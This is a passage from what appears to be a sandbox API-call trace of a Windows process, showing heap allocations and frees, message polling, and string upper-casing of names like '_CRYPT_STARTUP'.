0x88c970 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.650] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0033.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0033.651] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0033.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.652] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0033.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0033.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0033.655] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.655] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.655] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.655] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.656] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.656] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.656] HeapFree 